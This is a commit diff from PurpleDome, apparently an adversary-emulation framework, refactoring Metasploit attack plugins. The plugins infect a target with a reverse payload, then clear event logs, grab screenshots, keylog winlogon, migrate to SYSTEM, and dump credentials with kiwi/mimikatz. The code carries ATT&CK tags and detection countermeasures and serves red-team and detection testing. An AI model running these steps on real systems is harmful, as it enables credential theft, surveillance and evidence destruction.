archive
/
PurpleDome
mirror of https://github.com/avast/PurpleDome
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixed several issues in metasploit attacks

Browse Source
pull/12/head
Thorsten Sick 3 years ago
parent 0cf8400eae
commit ac482e8b9e
10 changed files with 164 additions and 124 deletions
Show Stats Download Patch File Download Diff File

112
app/metasploit.py
Unescape Escape View File

@ -600,29 +600,41 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
result=res)
return res
def clearev(self, target):
def clearev(self, target, **kwargs):
""" Clears windows event logs """
command = "clearev"
ttp = "T1070.001" # It uses one out of three different ways to elevate privileges.
tactics = "Defense Evasion"
tactics_id = "TA0005"
description = """
Clear windows event logs to hide tracks
"""
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="clearev",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target)
print(res)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid,
result=res)
return res
def screengrab(self, target):
def screengrab(self, target, **kwargs):
""" Creates a screenshot
Before using it, migrate to a process running while you want to monitor.
@ -631,14 +643,25 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
command = "screengrab"
ttp = "T1113" # It uses one out of three different ways to elevate privileges.
tactics = "Collection"
tactics_id = "TA0009"
description = """
Do screen grabbing to collect data on target
"""
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="screengrab",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on(["use espia"], target)
print(res)
res = self.meterpreter_execute_on([command], target)
@ -647,10 +670,11 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid,
result=res)
return res
def keylogging(self, target, monitoring_time):
def keylogging(self, target, monitoring_time, **kwargs):
""" Starts keylogging
Before using it, migrate to a process running while you want to monitor.
@ -658,19 +682,29 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
"winlogon.exe" will monitor user logins. "explorer.exe" during the session.
@param monitoring_time: Seconds the keylogger is running
@param monitoring_time: The time to monitor the keys. In seconds
"""
command = "keyscan_start"
ttp = "T1056.001" # It uses one out of three different ways to elevate privileges.
tactics = "Collection"
tactics_id = "TA0009"
description = """
Log keys to get passwords and other credentials
"""
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="keylogging",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target)
print(res)
time.sleep(monitoring_time)
@ -680,54 +714,80 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid,
result=res)
return res
def getuid(self, target):
def getuid(self, target, **kwargs):
""" Returns the UID
"""
command = "getuid"
ttp = "T1056.001" # It uses one out of three different ways to elevate privileges.
tactics = "Collection"
tactics_id = "TA0009"
description = """
Get user id
"""
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="getuid",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid,
result=res)
return res[0]
def sysinfo(self, target):
def sysinfo(self, target, **kwargs):
""" Returns the sysinfo
"""
command = "sysinfo"
ttp = "T1082" # It uses one out of three different ways to elevate privileges.
tactics = "Discovery"
tactics_id = "TA0007"
description = """
Get basic system information
"""
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="sysinfo",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid,
result=res)
return res[0]

21
plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitClearevPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -31,17 +33,12 @@ class MetasploitClearevPlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.clearev(target)
self.metasploit.clearev(target)
return res

33
plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
import socket
@ -17,6 +17,8 @@ class MetasploitGetsystemPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -33,27 +35,22 @@ class MetasploitGetsystemPlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name)
self.metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name)
# TODO: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70
metasploit.getsystem(target,
variant=self.conf['variant'],
situation_description="This is an example standalone attack step. In real world attacks there would be events before and after",
countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection."
)
self.metasploit.getsystem(target,
variant=self.conf['variant'],
situation_description="This is an example standalone attack step. In real world attacks there would be events before and after",
countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection."
)
return res

4
plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitGetuidPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__

14
plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitKeyloggingPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -31,19 +33,15 @@ class MetasploitKeyloggingPlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target,
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.migrate(target, name="winlogon.exe")
self.metasploit.migrate(target, name="winlogon.exe")
metasploit.keylogging(target, monitoring_time=20)
self.metasploit.keylogging(target, monitoring_time=20)
return res

34
plugins/default/metasploit_attacks/metasploit_kiwi_t1003/metasploit_kiwi_t1003.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
import socket
@ -17,6 +17,8 @@ class MetasploitKiwiPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -33,25 +35,21 @@ class MetasploitKiwiPlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name)
metasploit.kiwi(target,
variant=self.conf['variant'],
situation_description="Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory.",
countermeasure="Memory access into critical processes should be monitored."
)
self.metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name)
self.metasploit.kiwi(target,
variant=self.conf['variant'],
situation_description="Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory.",
countermeasure="Memory access into critical processes should be monitored."
)
return res

13
plugins/default/metasploit_attacks/metasploit_migrate_t1055/metasploit_migrate.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
import socket
@ -17,6 +17,8 @@ class MetasploitMigratePlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -32,14 +34,9 @@ class MetasploitMigratePlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
metasploit.smart_infect(target,
self.metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
@ -48,6 +45,6 @@ class MetasploitMigratePlugin(AttackPlugin):
outfile=payload_name
)
metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64")
self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64")
return res

13
plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitPsPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -31,17 +33,12 @@ class MetasploitPsPlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target,
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.ps_process_discovery(target)
self.metasploit.ps_process_discovery(target)
return res

23
plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitScreengrabPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -31,19 +33,14 @@ class MetasploitScreengrabPlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM")
self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM")
metasploit.screengrab(target)
self.metasploit.screengrab(target)
return res

21
plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py
Unescape Escape View File

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitSysinfoPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -31,18 +33,13 @@ class MetasploitSysinfoPlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
si = metasploit.sysinfo(target)
si = self.metasploit.sysinfo(target)
print(f"Sysinfo: {si}")
return res

Write Preview
Loading…
Cancel
Save